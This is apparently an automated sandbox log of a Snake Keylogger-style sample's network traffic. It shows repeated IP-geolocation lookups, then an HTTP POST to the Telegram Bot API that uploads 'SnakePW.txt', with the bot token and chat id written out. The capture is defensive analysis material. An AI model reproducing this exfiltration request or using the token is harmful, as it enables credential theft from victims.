                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.449738104.21.67.1524431432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 09:22:40 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-20 09:22:40 UTC854INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:40 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1349
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kU0F5Dt%2BbUelcgleEgj6K6efLESGAwbOaij8NVP0Hg%2FZel1Yli9J51QyB0gI8pI4hVZRwjm6lHf1oTXJDOkLaS5pU0kp%2FcUxNJFIh3YoACg%2BvNRQho6eFSzQZN7ikL9CQobQ8Apa"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f4e91bafacb8c65-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2010&rtt_var=762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1427174&cwnd=204&unsent_bytes=0&cid=4cf7e412872b5dd3&ts=455&x=0"
                                                                                                              2024-12-20 09:22:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.449739104.21.67.1524431432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 09:22:42 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2024-12-20 09:22:42 UTC854INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:42 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1351
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGqVHOU5tL2%2F3sOMj%2FeGqrwnzFUXxqy5T3ZpneTH2Iimw9ontQrEJD%2FX28PeSuR77FP8HBvOqEdrZP1biUZkNbNshzDSy9WO5fd3w5FYDcFHb0PH8z50%2F4gFeIelnHy4CkELSTtN"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f4e91c859294262-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1593&rtt_var=605&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1799137&cwnd=190&unsent_bytes=0&cid=10906f384769b08e&ts=453&x=0"
                                                                                                              2024-12-20 09:22:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.449741104.21.67.1524431432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 09:22:45 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-20 09:22:46 UTC852INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:46 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1355
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AstRoLykTjLLx5AVQn8u2E9F10MSYrGLzX%2FVnz2rxr3CuqrOTDD3U0q4QoEczN342%2B9SveYZ7KTxn9OuVkaWH6mHgezrAO56wF4K%2FWITm66chQ2CSqfBAyEuAgHvtdA86F5QLnU5"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f4e91de2e0dc445-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1470&rtt_var=567&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1902280&cwnd=227&unsent_bytes=0&cid=118ccaa21aa39735&ts=839&x=0"
                                                                                                              2024-12-20 09:22:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.449743104.21.67.1524431432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 09:22:48 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-20 09:22:49 UTC848INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:49 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1358
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XhJ64ksZAcfT4kxPwY9Z2K2a8Dz2eWqQ0rhTRRVbvdlyCkSEx9vu0xwB2OXfwZ8n71B0iO18zbdW9h4DkDem1huSgIcnLvC1ithXaRFoYnw2xBspn4cFghW1LqM0Sge5SKxxR%2FKI"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f4e91f18b518c1d-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1978&rtt_var=749&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1454183&cwnd=174&unsent_bytes=0&cid=e695cd8ee936f46d&ts=455&x=0"
                                                                                                              2024-12-20 09:22:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.449745104.21.67.1524431432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 09:22:52 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-20 09:22:52 UTC852INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:52 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1361
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wqie4zUxfpY9dGsfZ97ZgTJYfHADy0KSA%2FZ2vtu%2BI3X1IwrfkfSPXVST2yGs6zBp37NVvI9WrjNWG2849Ht0ybAwo4r9V84WfrFsSBV27pXvCI%2BPlCb7joSJTsYgWcAmPoE3WZ0s"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f4e9204ee1b426b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1555&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1791411&cwnd=232&unsent_bytes=0&cid=0fc21902e56d5f75&ts=452&x=0"
                                                                                                              2024-12-20 09:22:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.449747104.21.67.1524431432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 09:22:55 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-20 09:22:55 UTC854INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:55 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1364
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=omo1KXq7Mb7OtmfyIZ9ZvkldnZW4WeBC%2Fv3CXK0Du6GjewGPOd%2FIK6fpwuNZ47te%2B42U0OXanFjU0IcT4VWnJFNov4a5v7Zw%2FVQrQAiSf6ogcmWDmKHBtojvR5RJvHQt5h8KrVSi"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f4e92183d4b6a5e-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2496&min_rtt=2485&rtt_var=954&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1134421&cwnd=186&unsent_bytes=0&cid=ec6ecb472d9e6be1&ts=459&x=0"
                                                                                                              2024-12-20 09:22:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.449749104.21.67.1524431432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 09:22:58 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-20 09:22:58 UTC852INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:58 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1367
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9MwJ81m0gNMpWQEJpxBYkEyBEE%2FO1etFkBHjlCtw%2F%2FwbaH7OrUFfMskw09a1MbcTjGdxwVIwJUjzBHMtCWKsOYn8ofTl2coctwKnyV3SWn1arARFds0RNVajtbvxlY2UWNy93qY"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f4e922c29ab41bd-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1641&min_rtt=1610&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1813664&cwnd=248&unsent_bytes=0&cid=0996d2eee3ff1148&ts=454&x=0"
                                                                                                              2024-12-20 09:22:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.449753104.21.67.1524431432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 09:23:01 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-20 09:23:01 UTC858INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:23:01 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1370
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQDZkrnssYUaSEwI8fI9%2BVuLrc3qCK0NxVuEqDlnTYdaEfs%2BPalQILHX%2BZDTnYee5WyZ%2F54w8zkhAb8Y5S6XzGhir5H7TV1D7boTTe%2FfAYzA77M%2BRIitbZHkGT1f32cfiePnZmko"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f4e923fa9fc0f79-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1471&rtt_var=574&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1871794&cwnd=241&unsent_bytes=0&cid=83ac41f09792993b&ts=480&x=0"
                                                                                                              2024-12-20 09:23:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.449769149.154.167.2204431432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 09:23:08 UTC350OUTPOST /bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary=------------------------8dd21e85383b951
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 569
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-20 09:23:08 UTC569OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 65 38 35 33 38 33 62 39 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 30 2f 31 32 2f 32 30 32 34 20 2f 20 30 34 3a 32 32 3a 33 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                                                                                              Data Ascii: --------------------------8dd21e85383b951Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:965543Date and Time: 20/12/2024 / 04:22:36Client IP:
                                                                                                              2024-12-20 09:23:09 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 20 Dec 2024 09:23:09 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 514
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
